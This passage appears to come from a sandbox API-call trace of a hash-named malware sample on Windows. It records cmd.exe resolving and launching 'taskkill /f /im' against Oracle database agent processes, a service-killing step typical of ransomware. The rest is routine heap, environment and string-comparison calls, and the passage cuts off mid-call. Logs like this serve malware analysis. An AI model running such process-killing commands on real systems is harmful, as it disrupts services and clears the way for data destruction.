timer=0x0) returned 0x62344214 [0166.108] srand (_Seed=0x62344214) [0166.108] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im agntsvc.exeisqlplussvc.exe \"" [0166.108] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im agntsvc.exeisqlplussvc.exe \"" [0166.108] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0166.108] GetProcessHeap () returned 0x7e0000 [0166.108] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x210) returned 0x7e9b68 [0166.108] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7e9b70, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0166.108] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0166.108] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0166.108] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0166.108] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0166.108] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0166.108] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0166.108] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0166.108] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0166.109] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0166.109] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0166.109] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0166.109] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0166.109] GetProcessHeap () returned 0x7e0000 [0166.109] RtlFreeHeap (HeapHandle=0x7e0000, Flags=0x0, BaseAddress=0x7e8718) returned 1 [0166.109] GetEnvironmentStringsW () returned 0x7e7cf0* [0166.109] GetProcessHeap () returned 0x7e0000 [0166.110] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0xa32) returned 0x7ea7c0 [0166.110] FreeEnvironmentStringsA (penv="A") returned 1 [0166.110] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0166.110] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0166.110] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0166.110] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0166.110] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0166.110] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0166.110] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0166.110] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0166.110] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0166.110] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0166.110] GetProcessHeap () returned 0x7e0000 [0166.110] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x44) returned 0x7e05c8 [0166.110] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0166.110] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0166.111] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0166.111] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x7e0618 [0166.111] FindClose (in: hFindFile=0x7e0618 | out: hFindFile=0x7e0618) returned 1 [0166.111] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x7e0618 [0166.111] FindClose (in: hFindFile=0x7e0618 | out: hFindFile=0x7e0618) returned 1 [0166.111] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0166.111] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x7e0618 [0166.112] FindClose (in: hFindFile=0x7e0618 | out: hFindFile=0x7e0618) returned 1 [0166.112] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0166.112] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0166.112] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0166.112] GetProcessHeap () returned 0x7e0000 [0166.113] RtlFreeHeap (HeapHandle=0x7e0000, Flags=0x0, BaseAddress=0x7ea7c0) returned 1 [0166.113] GetEnvironmentStringsW () returned 0x7e7cf0* [0166.113] GetProcessHeap () returned 0x7e0000 [0166.113] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0xa76) returned 0x7e9d80 [0166.113] FreeEnvironmentStringsA (penv="=") returned 1 [0166.113] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0166.113] GetProcessHeap () returned 0x7e0000 [0166.113] RtlFreeHeap (HeapHandle=0x7e0000, Flags=0x0, BaseAddress=0x7e05c8) returned 1 [0166.113] GetProcessHeap () returned 0x7e0000 [0166.113] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x400e) returned 0x7ebc80 [0166.114] GetProcessHeap () returned 0x7e0000 [0166.114] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x68) returned 0x7ea800 [0166.114] GetProcessHeap () returned 0x7e0000 [0166.114] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x4008) returned 0x7efc98 [0166.114] GetProcessHeap () returned 0x7e0000 [0166.114] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x4008) returned 0x7f3ca8 [0166.116] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0166.117] GetProcessHeap () returned 0x7e0000 [0166.117] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x418) returned 0x7ea870 [0166.117] SetErrorMode (uMode=0x0) returned 0x8003 [0166.117] SetErrorMode (uMode=0x1) returned 0x0 [0166.117] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x7ea878, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0166.117] SetErrorMode (uMode=0x8003) returned 0x1 [0166.117] GetProcessHeap () returned 0x7e0000 [0166.117] RtlReAllocateHeap (Heap=0x7e0000, Flags=0x0, Ptr=0x7ea870, Size=0x9a) returned 0x7ea870 [0166.117] GetProcessHeap () returned 0x7e0000 [0166.117] RtlSizeHeap (HeapHandle=0x7e0000, Flags=0x0, MemoryPointer=0x7ea870) returned 0x9a [0166.117] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0166.117] GetProcessHeap () returned 0x7e0000 [0166.118] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x62) returned 0x7ea918 [0166.118] GetProcessHeap () returned 0x7e0000 [0166.118] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0xb8) returned 0x7ea988 [0166.118] GetProcessHeap () returned 0x7e0000 [0166.118] RtlReAllocateHeap (Heap=0x7e0000, Flags=0x0, Ptr=0x7ea988, Size=0x62) returned 0x7ea988 [0166.118] GetProcessHeap () returned 0x7e0000 [0166.118] RtlSizeHeap (HeapHandle=0x7e0000, Flags=0x0, MemoryPointer=0x7ea988) returned 0x62 [0166.118] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0166.118] GetProcessHeap () returned 0x7e0000 [0166.118] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0xe0) returned 0x7ea9f8 [0166.122] GetProcessHeap () returned 0x7e0000 [0166.122] RtlReAllocateHeap (Heap=0x7e0000, Flags=0x0, Ptr=0x7ea9f8, Size=0x76) returned 0x7ea9f8 [0166.122] GetProcessHeap () returned 0x7e0000 [0166.122] RtlSizeHeap (HeapHandle=0x7e0000, Flags=0x0, MemoryPointer=0x7ea9f8) returned 0x76 [0166.122] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0166.123] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im agntsvc.exeisqlplussvc.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0166.123] GetLastError () returned 0x3 [0166.123] GetProcessHeap () returned 0x7e0000 [0166.123] RtlFreeHeap (HeapHandle=0x7e0000, Flags=0x0, BaseAddress=0x7efc98) returned 1 [0166.123] GetProcessHeap () returned 0x7e0000 [0166.124] RtlFreeHeap (HeapHandle=0x7e0000, Flags=0x0, BaseAddress=0x7f3ca8) returned 1 [0166.124] GetProcessHeap () returned 0x7e0000 [0166.124] RtlFreeHeap (HeapHandle=0x7e0000, Flags=0x0, BaseAddress=0x7ebc80) returned 1 [0166.124] GetConsoleOutputCP () returned 0x1b5 [0166.129] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0166.129] GetUserDefaultLCID () returned 0x409 [0166.130] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0166.130] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0166.130] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0166.130] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0166.131] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0166.131] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0166.131] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0166.131] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0166.131] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0166.131] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0166.131] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0166.131] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0166.131] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0166.131] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0166.131] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0166.134] GetProcessHeap () returned 0x7e0000 [0166.134] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20c) returned 0x7eaac0 [0166.134] GetConsoleTitleW (in: lpConsoleTitle=0x7eaac0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0166.136] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0166.137] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0166.137] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0166.137] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0166.137] GetProcessHeap () returned 0x7e0000 [0166.137] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x400a) returned 0x7ebc80 [0166.138] GetProcessHeap () returned 0x7e0000 [0166.138] RtlFreeHeap (HeapHandle=0x7e0000, Flags=0x0, BaseAddress=0x7ebc80) returned 1 [0166.139] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0166.139] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0166.139] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0166.139] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0166.139] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0166.139] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0166.140] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0166.140] GetProcessHeap () returned 0x7e0000 [0166.140] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x58) returned 0x7eacd8 [0166.140] GetProcessHeap () returned 0x7e0000 [0166.140] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x1a) returned 0x7e0578 [0166.141] GetProcessHeap () returned 0x7e0000 [0166.141] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x50) returned 0x7ead38 [0166.142] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0166.145] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0166.145] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0166.145] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0166.145] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0166.145] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0166.145] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0166.145] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0166.145] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0166.145] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0166.145] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0166.145] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0166.145] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0166.145] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0166.145] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0166.145] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0166.145] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0166.145] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0166.145] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0166.145] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0166.145] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0166.145] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0166.146] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0166.146] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0166.146] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0166.146] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0166.146] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0166.146] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0166.146] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0166.146] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0166.147] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0166.147] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0166.147] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0166.147] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0166.147] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0166.147] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0166.147] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0166.147] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0166.147] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0166.147] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0166.147] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0166.147] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0166.147] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0166.147] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0166.147] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0166.147] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0166.147] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0166.147] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0166.147] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0166.147] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0166.147] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0166.147] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0166.147] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0166.148] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0166.148] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0166.148] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0166.148] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0166.148] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0166.148] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0166.148] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0166.148] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0166.148] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0166.148] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0166.148] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0166.148] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0166.148] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0166.148] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0166.148] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0166.148] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0166.148] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0166.148] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0166.149] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0166.149] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0166.149] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0166.149] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0166.149] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0166.149] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0166.149] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0166.149] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0166.149] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0166.149] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0166.149] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0166.149] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0166.149] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0166.149] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0166.149] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0166.149] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0166.149] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0166.150] GetProcessHeap () returned 0x7e0000 [0166.150] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x210) returned 0x7ead90 [0166.150] GetProcessHeap () returned 0x7e0000 [0166.150] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x62) returned 0x7eafa8 [0166.150] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0166.150] GetProcessHeap () returned 0x7e0000 [0166.150] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x418) returned 0x7e05c8 [0166.150] SetErrorMode (uMode=0x0) returned 0x8003 [0166.151] SetErrorMode (uMode=0x1) returned 0x0 [0166.151] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x7e05d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0166.151] SetErrorMode (uMode=0x8003) returned 0x1 [0166.151] GetProcessHeap () returned 0x7e0000 [0166.151] RtlReAllocateHeap (Heap=0x7e0000, Flags=0x0, Ptr=0x7e05c8, Size=0x56) returned 0x7e05c8 [0166.151] GetProcessHeap () returned 0x7e0000 [0166.151] RtlSizeHeap (HeapHandle=0x7e0000, Flags=0x0, MemoryPointer=0x7e05c8) returned 0x56 [0166.151] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0166.151] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0166.151] GetProcessHeap () returned 0x7e0000 [0166.151] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x110) returned 0x7eb018 [0166.151] GetProcessHeap () returned 0x7e0000 [0166.151] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x218) returned 0x7e0628 [0166.157] GetProcessHeap () returned 0x7e0000 [0166.157] RtlReAllocateHeap (Heap=0x7e0000, Flags=0x0, Ptr=0x7e0628, Size=0x112) returned 0x7e0628 [0166.157] GetProcessHeap () returned 0x7e0000 [0166.157] RtlSizeHeap (HeapHandle=0x7e0000, Flags=0x0, MemoryPointer=0x7e0628) returned 0x112 [0166.157] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0166.157] GetProcessHeap () returned 0x7e0000 [0166.157] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0xe0) returned 0x7e0748 [0166.160] GetProcessHeap () returned 0x7e0000 [0166.160] RtlReAllocateHeap (Heap=0x7e0000, Flags=0x0, Ptr=0x7e0748, Size=0x76) returned 0x7e0748 [0166.160] GetProcessHeap () returned 0x7e0000 [0166.160] RtlSizeHeap (HeapHandle=0x7e0000, Flags=0x0, MemoryPointer=0x7e0748) returned 0x76 [0166.160] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0166.160] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0166.161] GetLastError () returned 0x2 [0166.161] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0166.161] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x7eb130 [0166.161] GetProcessHeap () returned 0x7e0000 [0166.161] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x14) returned 0x7e7598 [0166.161] FindClose (in: hFindFile=0x7eb130 | out: hFindFile=0x7eb130) returned 1 [0166.161] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0166.162] GetLastError () returned 0x2 [0166.162] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x7eb130 [0166.162] GetProcessHeap () returned 0x7e0000 [0166.162] RtlReAllocateHeap (Heap=0x7e0000, Flags=0x0, Ptr=0x7e7598, Size=0x4) returned 0x7eb170 [0166.162] FindClose (in: hFindFile=0x7eb130 | out: hFindFile=0x7eb130) returned 1 [0166.162] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0166.162] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0166.162] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0166.163] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0166.163] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0166.163] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x130, hStdOutput=0x13c, hStdError=0x140)) [0166.164] GetProcessHeap () returned 0x7e0000 [0166.164] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x18) returned 0x7e7438 [0166.164] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0166.164] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0166.164] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0166.164] _wcsnicmp 